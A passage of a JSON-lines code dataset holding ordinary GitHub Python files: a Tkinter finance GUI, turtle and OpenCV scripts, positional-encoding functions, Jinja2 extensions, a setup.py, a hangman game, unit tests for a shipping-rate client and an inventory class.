text=finance.create_date).grid(row=6 + idx, column=0, sticky=STICKY_W_E_N_S)\n tk.Label(self, text=CONS_TYPE[finance.type]).grid(row=6 + idx, column=1, sticky=STICKY_W_E_N_S)\n tk.Label(self, text=finance.amount).grid(row=6 + idx, column=2, sticky=STICKY_W_E_N_S)\n tk.Label(self, text=finance.comments).grid(row=6 + idx, column=3, sticky=STICKY_W_E_N_S)\n tk.Button(self, text='编辑', 
command=partial(edit_finance_callback, finance.id)).grid(row=6 + idx, column=4, sticky=STICKY_W_E_N_S)\n tk.Button(self, text='删除', command=partial(delete_finance_callback, finance.id)).grid(row=6 + idx, column=5, sticky=STICKY_W_E_N_S)\n else:\n tk.Label(self, text=finance.create_date, bg='gray').grid(row=6 + idx, column=0, sticky=STICKY_W_E_N_S)\n tk.Label(self, text=CONS_TYPE[finance.type], bg='gray').grid(row=6 + idx, column=1, sticky=STICKY_W_E_N_S)\n tk.Label(self, text=finance.amount, bg='gray').grid(row=6 + idx, column=2, sticky=STICKY_W_E_N_S)\n tk.Label(self, text=finance.comments, bg='gray').grid(row=6 + idx, column=3, sticky=STICKY_W_E_N_S)\n tk.Button(self, text='编辑', command=partial(edit_finance_callback, finance.id), bg='gray').grid(row=6 + idx, column=4, sticky=STICKY_W_E_N_S)\n tk.Button(self, text='删除', command=partial(delete_finance_callback, finance.id), bg='gray').grid(row=6 + idx, column=5, sticky=STICKY_W_E_N_S)\n tk.Button(self, text='添加', command=add_finance_callback).grid(row=6 + finance_list_length, sticky=tk.W)\n tk.Label(self, text='总收入: %s' % total_input).grid(row=7 + finance_list_length, sticky=tk.W)\n tk.Label(self, text='总支出: %s' % total_output).grid(row=8 + finance_list_length, sticky=tk.W)\n else:\n tk.Label(self, text=u'你还没有个人财务记录', bg='red').grid(row=4, sticky=tk.W)\n tk.Button(self, text='添加', command=add_finance_callback).grid(row=5, sticky=tk.W)\n\n\nclass FinanceAddPage(tk.Frame):\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n\n tk.Label(self, text=u'类 型:').grid(row=0, sticky=tk.W)\n tk.Label(self, text=u'金 额:').grid(row=1, sticky=tk.W)\n tk.Label(self, text=u'注 释:').grid(row=2, sticky=tk.W)\n\n v = tk.StringVar()\n v.set(1)\n inputraido = tk.Radiobutton(self, text=u'收入', variable=v, value=1)\n inputraido.grid(row=0, column=1, sticky=tk.W)\n outputradio = tk.Radiobutton(self, text=u'支出', variable=v, value=2)\n outputradio.grid(row=0, column=2, sticky=tk.W)\n\n amountinput = tk.Entry(self)\n amountinput.grid(row=1, column=1, columnspan=2, sticky=tk.W)\n\n commentstext = tk.Entry(self)\n commentstext.grid(row=2, column=1, columnspan=2, sticky=tk.W)\n\n def save_add_callback():\n type = int(v.get())\n amount = float(amountinput.get())\n comments = commentstext.get()\n comments = comments.strip()\n\n data = {\n 'type': type,\n 'amount': amount,\n 'comments': comments,\n }\n Finance.add(current_user.id, data)\n self.controller.set_pages([HomePage], force_update=True)\n self.controller.show_frame('FinanceAddPage')\n\n def add_back_callback():\n save_add_callback()\n self.controller.show_frame('HomePage')\n\n def cancel_add_callback():\n self.controller.show_frame('HomePage')\n\n tk.Button(self, text=u'保存&继续添加', command=save_add_callback).grid(row=3, column=0)\n tk.Button(self, text=u'添加&返回', command=add_back_callback).grid(row=3, column=1)\n tk.Button(self, text=u'返回', command=cancel_add_callback).grid(row=3, column=2)\n\n\nclass FinanceEditPage(tk.Frame):\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n\n global current_finance\n tk.Label(self, text=u'类 型:').grid(row=0, sticky=tk.W)\n tk.Label(self, text=u'金 额:').grid(row=1, sticky=tk.W)\n tk.Label(self, text=u'注 释:').grid(row=2, sticky=tk.W)\n\n v = tk.StringVar()\n v.set(current_finance.type)\n inputraido = tk.Radiobutton(self, text=u'收入', variable=v, value=1)\n inputraido.grid(row=0, column=1, sticky=tk.W)\n outputradio = tk.Radiobutton(self, text=u'支出', variable=v, value=2)\n 
outputradio.grid(row=0, column=2, sticky=tk.W)\n\n amountinput = tk.Entry(self)\n amountinput.insert(tk.END, current_finance.amount)\n amountinput.grid(row=1, column=1, columnspan=2, sticky=tk.W)\n\n commentstext = tk.Entry(self)\n commentstext.insert(tk.END, current_finance.comments)\n commentstext.grid(row=2, column=1, columnspan=2, sticky=tk.W)\n\n def save_callback():\n type = int(v.get())\n amount = float(amountinput.get())\n comments = commentstext.get()\n comments = comments.strip()\n\n current_finance.type = type\n current_finance.amount = amount\n current_finance.comments = comments\n Finance.update(current_finance)\n self.controller.set_pages([HomePage], force_update=True)\n self.controller.show_frame('FinanceEditPage')\n\n def save_back_callback():\n save_callback()\n self.controller.show_frame('HomePage')\n\n def cancel_edit_callback():\n self.controller.show_frame('HomePage')\n\n tk.Button(self, text=u'保存', command=save_callback).grid(row=3, column=0)\n tk.Button(self, text=u'保存&返回', command=save_back_callback).grid(row=3, column=1)\n tk.Button(self, text=u'返回', command=cancel_edit_callback).grid(row=3, column=2)\n\n\nclass UserEditPage(tk.Frame):\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n\n global current_user\n tk.Label(self, text=u'姓 名:').grid(row=0, sticky=tk.W)\n tk.Label(self, text=u'性 别:').grid(row=1, sticky=tk.W)\n\n nameinput = tk.Entry(self)\n nameinput.insert(tk.END, current_user.name)\n nameinput.grid(row=0, column=1, columnspan=2, sticky=tk.W)\n\n v = tk.StringVar()\n v.set(current_user.sex)\n maleraido = tk.Radiobutton(self, text=u'男', variable=v, value=1)\n maleraido.grid(row=1, column=1, sticky=tk.W)\n femaleradio = tk.Radiobutton(self, text=u'女', variable=v, value=2)\n femaleradio.grid(row=1, column=2, sticky=tk.W)\n\n def save_callback():\n name = nameinput.get()\n name = name.strip()\n sex = int(v.get())\n\n current_user.name = name\n current_user.sex = sex\n User.update(current_user)\n self.controller.set_pages([HomePage], force_update=True)\n self.controller.show_frame('UserEditPage')\n\n def save_back_callback():\n save_callback()\n self.controller.show_frame('HomePage')\n\n def cancel_edit_callback():\n self.controller.show_frame('HomePage')\n\n tk.Button(self, text=u'保存', command=save_callback).grid(row=2, column=0)\n tk.Button(self, text=u'保存&返回', command=save_back_callback).grid(row=2, column=1)\n tk.Button(self, text=u'返回', command=cancel_edit_callback).grid(row=2, column=2)\n\n\ndef run():\n app = App()\n app.set_pages([LoginPage])\n app.show_frame('LoginPage')\n\n app.title(u'个人财务管理系统')\n app.geometry('640x480')\n app.resizable(width=True, height=True)\n app.mainloop()\n","repo_name":"thrbowl/my_finance","sub_path":"my_finance/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":12636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"15979091360","text":"from turtle import Turtle\n\nFONT = (\"Courier\", 20, \"bold\")\n\n\nclass Scoreboard(Turtle):\n \n def __init__(self):\n super().__init__()\n self.level = 1\n self.create()\n\n def create(self):\n self.hideturtle()\n self.penup()\n self.color(\"black\")\n self.setposition(-280, 260)\n self.write(f\"Level: {self.level}\", False, \"left\", FONT)\n\n def update(self):\n super().clear()\n self.level += 1\n self.create()\n\n def game_over(self):\n self.setposition(0, 0)\n self.write(f\"Game Over!\\nMax level: {self.level}\", False, \"center\", 
FONT)\n","repo_name":"Mohamed-Aladdin/Coding-Projects","sub_path":"100 Days of Code/turtle-crossing-start/scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"17724417087","text":"import numpy as np\nfrom scipy import special\nfrom scipy import signal\nimport math\n\n\ndef positionencoding1D(W, L):\n\n x_linspace = (np.linspace(0, W - 1, W) / W) * 2 - 1\n\n x_el = []\n\n x_el_hf = []\n\n pe_1d = np.zeros((W, 2*L+1))\n # cache the values so you don't have to do function calls at every pixel\n for el in range(0, L):\n val = 2 ** el\n\n x = np.sin(val * np.pi * x_linspace)\n x_el.append(x)\n\n x = np.cos(val * np.pi * x_linspace)\n x_el_hf.append(x)\n\n\n for x_i in range(0, W):\n\n p_enc = []\n\n for li in range(0, L):\n p_enc.append(x_el[li][x_i])\n p_enc.append(x_el_hf[li][x_i])\n\n p_enc.append(x_linspace[x_i])\n\n pe_1d[x_i] = np.array(p_enc)\n\n return pe_1d.astype('float32')\n\n\n\ndef positionencoding2D(W, H, L, basis_function,epoch):\n\n fre=np.clip(epoch/30000,0,1)\n x_linspace = (np.linspace(0, W - 1, W) / W) * 2 - 1\n y_linspace = (np.linspace(0, H - 1, H) / H) * 2 - 1\n\n x_el = []\n y_el = []\n\n x_el_hf = []\n y_el_hf = []\n\n pe_2d = np.zeros((W, H, 4*L+2))\n # cache the values so you don't have to do function calls at every pixel\n for el in range(0, L):\n val = 2 ** el\n\n if basis_function == 'rbf':\n\n # Trying Random Fourier Features https://www.cs.cmu.edu/~schneide/DougalRandomFeatures_UAI2015.pdf\n # and https://gist.github.com/vvanirudh/2683295a198a688ef3c49650cada0114\n\n # Instead of a phase shift of pi/2, we could randomise it [-pi, pi]\n\n M_1 = np.random.rand(2, 2)\n\n phase_shift = np.random.rand(1) * np.pi\n\n x_1_y_1 = np.sin(val * np.matmul(M_1, np.vstack((x_linspace, y_linspace))))\n x_el.append(x_1_y_1[0, :])\n y_el.append(x_1_y_1[1, :])\n\n x_1_y_1 = np.sin(val * np.matmul(M_1, np.vstack((x_linspace, y_linspace))) + phase_shift)\n x_el_hf.append(x_1_y_1[0, :])\n y_el_hf.append(x_1_y_1[1, :])\n\n elif basis_function == 'diric':\n\n x = special.diric(np.pi * x_linspace, val)\n x_el.append(x)\n\n x = special.diric(np.pi * x_linspace + np.pi / 2.0, val)\n x_el_hf.append(x)\n\n y = special.diric(np.pi * y_linspace, val)\n y_el.append(y)\n\n y = special.diric(np.pi * y_linspace + np.pi / 2.0, val)\n y_el_hf.append(y)\n\n elif basis_function == 'sawtooth':\n x = signal.sawtooth(val * np.pi * x_linspace)\n x_el.append(x)\n\n x = signal.sawtooth(val * np.pi * x_linspace + np.pi / 2.0)\n x_el_hf.append(x)\n\n y = signal.sawtooth(val * np.pi * y_linspace)\n y_el.append(y)\n\n y = signal.sawtooth(val * np.pi * y_linspace + np.pi / 2.0)\n y_el_hf.append(y)\n\n elif basis_function == 'sin_cos':\n\n x = np.sin(val * np.pi * x_linspace)\n x_el.append(x)\n\n x = np.cos(val * np.pi * x_linspace)\n x_el_hf.append(x)\n\n y = np.sin(val * np.pi * y_linspace)\n y_el.append(y)\n\n y = np.cos(val * np.pi * y_linspace)\n y_el_hf.append(y)\n\n for y_i in range(0, H):\n for x_i in range(0, W):\n\n p_enc = []\n\n for li in range(0, L):\n p_enc.append(x_el[li][x_i])\n p_enc.append(x_el_hf[li][x_i])\n\n p_enc.append(y_el[li][y_i])\n p_enc.append(y_el_hf[li][y_i])\n\n p_enc.append(x_linspace[x_i])\n p_enc.append(y_linspace[y_i])\n\n pe_2d[x_i, y_i] = np.array(p_enc)\n\n return pe_2d.astype('float32')\n\n\n\ndef positionencoding3D(W, H, D, L1, L2):\n\n x_linspace = (np.linspace(0, W - 1, W) / W) * 2 - 1\n y_linspace = (np.linspace(0, H - 1, H) / H) * 
2 - 1\n z_linspace = (np.linspace(0, D - 1, D) / D) * 2 - 1\n\n x_el = []\n y_el = []\n z_el = []\n\n x_el_hf = []\n y_el_hf = []\n z_el_hf = []\n\n pe_3d = np.zeros((W, H, D, 4*L1+3+2*L2))\n # cache the values so you don't have to do function calls at every pixel\n for el in range(0, L1):\n val = 2 ** el\n\n x = np.sin(val * np.pi * x_linspace)\n x_el.append(x)\n\n x = np.cos(val * np.pi * x_linspace)\n x_el_hf.append(x)\n\n y = np.sin(val * np.pi * y_linspace)\n y_el.append(y)\n\n y = np.cos(val * np.pi * y_linspace)\n y_el_hf.append(y)\n\n if el < L2:\n z = np.sin(val * np.pi * z_linspace)\n z_el.append(z)\n\n z = np.cos(val * np.pi * z_linspace)\n z_el_hf.append(z)\n\n\n for z_i in range(0, D):\n for y_i in range(0, H):\n for x_i in range(0, W):\n\n p_enc = []\n\n for li in range(0, L1):\n p_enc.append(x_el[li][x_i])\n p_enc.append(x_el_hf[li][x_i])\n\n p_enc.append(y_el[li][y_i])\n p_enc.append(y_el_hf[li][y_i])\n\n if li < L2:\n p_enc.append(z_el[li][z_i])\n p_enc.append(z_el_hf[li][z_i])\n\n p_enc.append(x_linspace[x_i])\n p_enc.append(y_linspace[y_i])\n p_enc.append(z_linspace[z_i])\n\n pe_3d[x_i, y_i, z_i] = np.array(p_enc)\n\n return pe_3d.astype('float32')","repo_name":"meixiaoyinn/CEINR","sub_path":"PositionEncoding.py","file_name":"PositionEncoding.py","file_ext":"py","file_size_in_byte":5309,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"30157363064","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport cv2\n\ncv2.namedWindow(\"image\", cv2.WINDOW_NORMAL) # Create window with freedom of dimensions\nim = cv2.imread(\"1.jpeg\") # Read image\nimS = cv2.resize(im, (348, 464)) # Resize image\ncv2.imshow(\"image\", imS) # Show image\ncv2.waitKey(0) \ncv2.destroyAllWindows()\n\nb = imS.copy()\n# set green and red channels to 0\nb[:, :, 1] = 0\nb[:, :, 2] = 0\n\n\ng = imS.copy()\n# set blue and red channels to 0\ng[:, :, 0] = 0\ng[:, :, 2] = 0\n\nr = imS.copy()\n# set blue and green channels to 0\nr[:, :, 0] = 0\nr[:, :, 1] = 0\n\n\n# RGB - Blue\nbrgb=cv2.imshow('B-RGB', b)\ncv2.imwrite('brgb.jpeg', b)\n# RGB - Green\ngrgb=cv2.imshow('G-RGB', g)\ncv2.imwrite('grgb.jpeg',g)\n# RGB - Red\nrrgb=cv2.imshow('R-RGB', r)\ncv2.imwrite('rrgb.jpeg', r)\n\nb=cv2.imshow('Blue Channel', imS[:,:,0])\ncv2.imwrite('b.jpeg', imS[:,:,0])\ng=cv2.imshow('Green Channel', imS[:,:,1])\ncv2.imwrite('g.jpeg', imS[:,:,1])\nr=cv2.imshow('Red Channel', imS[:,:,2])\ncv2.imwrite('r.jpeg', imS[:,:,2])\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"frenzytejask98/VR_Assignment1","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"1130175623","text":"from jinja2.ext import Extension, Markup\nfrom jinja2.lexer import Token, describe_token\nfrom jinja2.nodes import CallBlock, Const\nfrom compressinja.html import HtmlCompressor, StreamProcessContext\nfrom piecrust.rendering import format_text\n\n\nclass PieCrustFormatExtension(Extension):\n tags = set(['pcformat'])\n\n def __init__(self, environment):\n super(PieCrustFormatExtension, self).__init__(environment)\n\n def parse(self, parser):\n lineno = next(parser.stream).lineno\n args = [parser.parse_expression()]\n body = parser.parse_statements(['name:endpcformat'], drop_needle=True)\n return CallBlock(self.call_method('_formatTimed', args),\n [], [], body).set_lineno(lineno)\n\n def _formatTimed(self, format_name, 
caller=None):\n with self.environment.app.env.stats.timerScope(\n 'JinjaTemplateEngine_extensions'):\n return self._format(format_name, caller)\n\n def _format(self, format_name, caller=None):\n body = caller()\n text = format_text(self.environment.app,\n format_name,\n Markup(body.rstrip()).unescape(),\n exact_format=True)\n return text\n\n\nclass PieCrustHighlightExtension(Extension):\n tags = set(['highlight', 'geshi'])\n\n def __init__(self, environment):\n super(PieCrustHighlightExtension, self).__init__(environment)\n\n def parse(self, parser):\n lineno = next(parser.stream).lineno\n\n # Extract the language name.\n args = [parser.parse_expression()]\n\n # Extract optional arguments.\n kwarg_names = {'line_numbers': 0, 'use_classes': 0, 'class': 1,\n 'id': 1}\n kwargs = {}\n while not parser.stream.current.test('block_end'):\n name = parser.stream.expect('name')\n if name.value not in kwarg_names:\n raise Exception(\"'%s' is not a valid argument for the code \"\n \"highlighting tag.\" % name.value)\n if kwarg_names[name.value] == 0:\n kwargs[name.value] = Const(True)\n elif parser.stream.skip_if('assign'):\n kwargs[name.value] = parser.parse_expression()\n\n # body of the block\n body = parser.parse_statements(['name:endhighlight', 'name:endgeshi'],\n drop_needle=True)\n\n return CallBlock(self.call_method('_highlightTimed', args, kwargs),\n [], [], body).set_lineno(lineno)\n\n def _highlightTimed(self, lang, line_numbers=False, use_classes=False,\n css_class=None, css_id=None, caller=None):\n with self.environment.app.env.stats.timerScope(\n 'JinjaTemplateEngine_extensions'):\n return self._highlight(lang, line_numbers, use_classes,\n css_class, css_id, caller)\n\n def _highlight(self, lang, line_numbers=False, use_classes=False,\n css_class=None, css_id=None, caller=None):\n from pygments import highlight\n from pygments.formatters import HtmlFormatter\n from pygments.lexers import get_lexer_by_name, guess_lexer\n\n # Try to be mostly compatible with Jinja2-highlight's settings.\n body = caller()\n\n if lang is None:\n lexer = guess_lexer(body)\n else:\n lexer = get_lexer_by_name(lang, stripall=False)\n\n if css_class is None:\n try:\n css_class = self.environment.jinja2_highlight_cssclass\n except AttributeError:\n pass\n\n if css_class is not None:\n formatter = HtmlFormatter(cssclass=css_class,\n linenos=line_numbers)\n else:\n formatter = HtmlFormatter(linenos=line_numbers)\n\n code = highlight(Markup(body.rstrip()).unescape(), lexer, formatter)\n return code\n\n\ndef get_highlight_css(style_name='default', class_name='.highlight'):\n from pygments.formatters import HtmlFormatter\n return HtmlFormatter(style=style_name).get_style_defs(class_name)\n\n\nclass PieCrustCacheExtension(Extension):\n tags = set(['pccache', 'cache'])\n\n def __init__(self, environment):\n super(PieCrustCacheExtension, self).__init__(environment)\n environment.extend(\n piecrust_cache_prefix='',\n piecrust_cache={}\n )\n\n def parse(self, parser):\n # the first token is the token that started the tag. In our case\n # we only listen to ``'pccache'`` so this will be a name token with\n # `pccache` as value. 
We get the line number so that we can give\n # that line number to the nodes we create by hand.\n lineno = next(parser.stream).lineno\n\n # now we parse a single expression that is used as cache key.\n args = [parser.parse_expression()]\n\n # now we parse the body of the cache block up to `endpccache` and\n # drop the needle (which would always be `endpccache` in that case)\n body = parser.parse_statements(['name:endpccache', 'name:endcache'],\n drop_needle=True)\n\n # now return a `CallBlock` node that calls our _renderCache\n # helper method on this extension.\n return CallBlock(self.call_method('_renderCacheTimed', args),\n [], [], body).set_lineno(lineno)\n\n def _renderCacheTimed(self, name, caller):\n with self.environment.app.env.stats.timerScope(\n 'JinjaTemplateEngine_extensions'):\n return self._renderCache(name, caller)\n\n def _renderCache(self, name, caller):\n key = self.environment.piecrust_cache_prefix + name\n\n rcs = self.environment.app.env.render_ctx_stack\n ctx = rcs.current_ctx\n\n # try to load the block from the cache\n # if there is no fragment in the cache, render it and store\n # it in the cache.\n pair = self.environment.piecrust_cache.get(key)\n if pair is not None:\n for usn in pair[1]:\n ctx.addUsedSource(usn)\n return pair[0]\n\n prev_used = set(ctx.current_used_source_names)\n rv = caller()\n after_used = set(ctx.current_used_source_names)\n used_delta = after_used.difference(prev_used)\n self.environment.piecrust_cache[key] = (rv, used_delta)\n return rv\n\n\nclass PieCrustSpacelessExtension(HtmlCompressor):\n \"\"\" A re-implementation of `SelectiveHtmlCompressor` so that we can\n both use `strip` or `spaceless` in templates.\n \"\"\"\n def filter_stream(self, stream):\n ctx = StreamProcessContext(stream)\n strip_depth = 0\n while 1:\n if stream.current.type == 'block_begin':\n for tk in ['strip', 'spaceless']:\n change = self._processToken(ctx, stream, tk)\n if change != 0:\n strip_depth += change\n if strip_depth < 0:\n ctx.fail('Unexpected tag end%s' % tk)\n break\n if strip_depth > 0 and stream.current.type == 'data':\n ctx.token = stream.current\n value = self.normalize(ctx)\n yield Token(stream.current.lineno, 'data', value)\n else:\n yield stream.current\n next(stream)\n\n def _processToken(self, ctx, stream, test_token):\n change = 0\n if (stream.look().test('name:%s' % test_token) or\n stream.look().test('name:end%s' % test_token)):\n stream.skip()\n if stream.current.value == test_token:\n change = 1\n else:\n change = -1\n stream.skip()\n if stream.current.type != 'block_end':\n ctx.fail('expected end of block, got %s' %\n describe_token(stream.current))\n stream.skip()\n return change\n","repo_name":"ludovicchabant/PieCrust2","sub_path":"piecrust/templating/jinja/extensions.py","file_name":"extensions.py","file_ext":"py","file_size_in_byte":8018,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"68"} +{"seq_id":"2703322713","text":"#!/usr/bin/env python\n\nfrom distutils.core import setup, Extension\nfrom distutils.sysconfig import customize_compiler\nfrom distutils.command.build_ext import build_ext\n\nimport os\nimport glob\n\n\n# https://stackoverflow.com/questions/8106258/cc1plus-warning-command-line-option-wstrict-prototypes-is-valid-for-ada-c-o/9740721\n# Avoid a gcc warning below:\n# cc1plus: warning: command line option ‘-Wstrict-prototypes’ is valid\n# for C/ObjC but not for C++\nclass BuildExt(build_ext):\n def build_extensions(self):\n customize_compiler(self.compiler)\n try:\n 
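# list.remove() raises ValueError when the flag is absent, and some compilers expose no compiler_so attribute, hence the two-way except below\n            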
self.compiler.compiler_so.remove(\"-Wstrict-prototypes\")\n except (AttributeError, ValueError):\n pass\n build_ext.build_extensions(self)\n\n\n# cpp sources\nsources = glob.glob(os.path.join('src', 'audacity', '*.cpp'))\nsources += ['src/pyaudacity/noiseredmodule.cpp']\n\n# additional CFLAGS\nextra_compile_args = ['-std=c++14', '-Wextra', '-pedantic',\n '-Wno-unused-parameter', '-Wno-unused-variable',\n '-Wno-implicit-fallthrough']\n\n# create build module\nmodule = Extension(name='cmodule',\n # define_macros=[('MAJOR_VERSION', '2'), ('MINOR_VERSION', '1')],\n libraries=['stdc++', 'sndfile', 'soxr'],\n language='c++14',\n extra_compile_args=extra_compile_args,\n include_dirs=['src/audacity'],\n sources=sources,\n )\n\n# run build\nsetup(name='pyaudacity',\n cmdclass={'build_ext': BuildExt},\n version='0.1',\n ext_package='pyaudacity',\n packages=['pyaudacity'],\n package_dir={'pyaudacity': 'src/pyaudacity'},\n description='Audacity noise reduction python porting library.',\n author='photom',\n license='GPL-2.0',\n author_email='photometrician@gmail.com',\n url='https://github.com/photom/pyaudacity_noisered',\n ext_modules=[module])\n","repo_name":"photom/pyaudacity_noisered","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"68"} +{"seq_id":"15581821452","text":"# Hangman game\n\nimport random\n\nWORDLIST_FILENAME = \"words.txt\"\n\ndef loadWords():\n \"\"\"\n Returns a list of valid words. Words are strings of lowercase letters.\n \n Depending on the size of the word list, this function may\n take a while to finish.\n \"\"\"\n print(\"Loading word list from file...\")\n # inFile: file\n inFile = open(WORDLIST_FILENAME, 'r')\n # line: string\n line = inFile.readline()\n # wordlist: list of strings\n wordlist = line.split()\n print(\" \", len(wordlist), \"words loaded.\")\n return wordlist\n\ndef chooseWord(wordlist):\n \"\"\"\n wordlist (list): list of words (strings)\n\n Returns a word from wordlist at random\n \"\"\"\n return random.choice(wordlist)\n\nwordlist = loadWords()\n\ndef isWordGuessed(secretWord, lettersGuessed):\n return set(secretWord).issubset(lettersGuessed)\n\n\ndef getGuessedWord(secretWord, lettersGuessed):\n value = \"\"\n string = \"\"\n for i in secretWord:\n if i in lettersGuessed:\n value = i + \" \"\n else:\n value = \"_ \"\n string += value\n return string\ndef getAvailableLetters(lettersGuessed):\n import string\n lettersA = list(string.ascii_lowercase)\n b = [ x for x in lettersA if not x in lettersGuessed ] \n return ''.join(b)\ndef hangman(secretWord):\n \n print(\"Welcome to the game, Hangman!\") \n print(\"I am thinking of a word that is\", str(len(secretWord)), \" letters long.\") \n print(\"-------------\") \n guessLeft = 8 \n lettersGuessed=[]\n while guessLeft > 0 and not isWordGuessed(secretWord, lettersGuessed):\n print(\"You have \" + str(guessLeft) + \" guesses left.\")\n print(\"Available letters: \" + str(getAvailableLetters(lettersGuessed)))\n guess = (str(input(\"Please guess a letter: \"))).lower()\n if guess not in lettersGuessed:\n lettersGuessed.append(guess)\n if guess in secretWord:\n print('Good guess: ', str(getGuessedWord(secretWord, lettersGuessed)))\n print(\"------------\")\n else:\n guessLeft -= 1\n print(\"Oops! That letter is not in my word: \", str(getGuessedWord(secretWord, lettersGuessed)))\n print(\"------------\")\n else:\n print(\"Oops! 
You've already guessed that letter: \", str(getGuessedWord(secretWord, lettersGuessed)))\n print(\"------------\")\n if isWordGuessed(secretWord, lettersGuessed): \n print(\"Congratulations, you won!\") \n else:\n print(\"Sorry, you ran out of guesses. The word was\", str(secretWord)) \n\nsecretWord = chooseWord(wordlist).lower()\nhangman(secretWord)\n","repo_name":"krausce/Hangman","sub_path":"ps3_hangman.py","file_name":"ps3_hangman.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"70613022937","text":"def time_on_road(in_h, in_m, out_h, out_m):\n t_minute = (out_h*60 + out_m) - (in_h*60 + in_m)\n if t_minute > 0:\n return t_minute/60\n else:\n #past 24 hour, in minutes \n t_minute = (1440 + out_m) - (in_h*60 + in_m)\n return t_minute/60\n\nwith open(\"forgalom.txt\", \"r\") as f:\n f=[x.split() for x in f.readlines()]\n over_100km_per_h = [] \n for i in range(len(f)):\n #The time of the car while on the road in minutes\n t_hour = time_on_road(int(f[i][1]), int(f[i][2]), int(f[i][3]), int(f[i][4]))\n #the speed of the car on a 10 km road in hours now\n v=10/t_hour\n if v >= 100:\n over_100km_per_h.append(f[i])\n \nprint(over_100km_per_h)\nprint((len(over_100km_per_h)))\n ","repo_name":"molnar780/Neuman-verseny","sub_path":"Neumann/2022/1.ford/2 fel/2,b.py","file_name":"2,b.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"37286611005","text":"import unittest\nimport collections\nfrom unittest import mock\nfrom unittest.mock import MagicMock\nfrom io import StringIO\n\nfrom correios.core import (\n get_url,\n parse_xml,\n get_servicos_list,\n handle_request,\n)\n\nclass TestGetUrl(unittest.TestCase):\n def setUp(self):\n self.endpoint = 'http://test.com/'\n\n def test_empty_params(self):\n params = {}\n expected = 'http://test.com/?'\n self.assertEqual(get_url(self.endpoint, params), expected)\n\n def test_one_param(self):\n params = {\n 'foo': 'bar',\n }\n expected = 'http://test.com/?foo=bar'\n self.assertEqual(get_url(self.endpoint, params), expected)\n\n def test_n_params(self):\n params = collections.OrderedDict()\n params['foo'] = 'bar'\n params['uni'] = 'duni te'\n params['abra'] = 'cadabra'\n \n expected = 'http://test.com/?foo=bar&uni=duni+te&abra=cadabra'\n self.assertEqual(get_url(self.endpoint, params), expected)\n\n\nclass TestParseXML(unittest.TestCase):\n def setUp(self):\n self.xml = \"\"\"\n \n \n 04510\n 26,20\n 6\n \n \"\"\"\n\n def test_empty_string(self):\n xml = ''\n self.assertEqual(parse_xml(xml), {})\n\n def test_xml_with_empty_value(self):\n xml = ''\n expected = {\n 'Servicos': None,\n }\n self.assertEqual(parse_xml(xml), expected)\n\n def test_parse_xml_ok(self):\n expected = {\n 'Servicos': {\n 'cServico': {\n 'Codigo': '04510',\n 'Valor': '26,20',\n 'PrazoEntrega': '6',\n }\n }\n }\n self.assertEqual(parse_xml(self.xml), expected)\n\n\n\nclass TestGetServicosList(unittest.TestCase):\n def test_empty_dict(self):\n data = {}\n self.assertEqual(get_servicos_list(data), [])\n\n def test_with_servicos_empty(self):\n data = {\n 'Servicos': '',\n }\n self.assertEqual(get_servicos_list(data), [])\n\n def test_with_servicos_and_servico_not_dict(self):\n data = {\n 'Servicos': {\n 'cServico': ['foo', 'bar'],\n }\n }\n self.assertEqual(get_servicos_list(data), ['foo', 'bar'])\n\n\n# RESPONSE_MOCK_OK = \"\"\"\n# \n# \n# 04510\n# 26,20\n# 6\n# 26,20\n# 0,00\n# 
0,00\n# 0,00\n# S\n# N\n# \n# 0\n# \n# \n# \"\"\"\n\n\n# class TestHandleRequest(unittest.TestCase):\n# def setUp(self):\n# self.url = 'http://test.com/?foo=bar&uni=duni+te&abra=cadabra'\n\n# @mock.patch('correios.core.urlopen', return_value=StringIO(RESPONSE_MOCK_OK)) \n# def test_response_ok(self, mock_urlopen):\n# self.assertEqual(handle_request(self.url), RESPONSE_MOCK_OK)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"edussilva/correios","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"12663459160","text":"class InventoryControl:\n INGREDIENTS = {\n 'hamburguer': ['pao', 'carne', 'queijo'],\n 'pizza': ['massa', 'queijo', 'molho'],\n 'misto-quente': ['pao', 'queijo', 'presunto'],\n 'coxinha': ['massa', 'frango'],\n }\n MINIMUM_INVENTORY = {\n 'pao': 50,\n 'carne': 50,\n 'queijo': 100,\n 'molho': 50,\n 'presunto': 50,\n 'massa': 50,\n 'frango': 50,\n }\n\n def __init__(self):\n self.data = list()\n\n def add_new_order(self, customer, order, day):\n check = self.check_ingredient_availability(order)\n if check is False:\n return False\n else:\n self.data.append({\n \"id\": len(self.data),\n \"customer\": customer,\n \"order\": order,\n \"day\": day\n })\n\n def get_quantities_to_buy(self):\n buy_list = self.MINIMUM_INVENTORY.copy()\n for key in buy_list.keys():\n buy_list[key] = 0\n for order in self.data:\n buy_list[self.INGREDIENTS[order[\"order\"]][0]] += 1\n buy_list[self.INGREDIENTS[order[\"order\"]][1]] += 1\n if 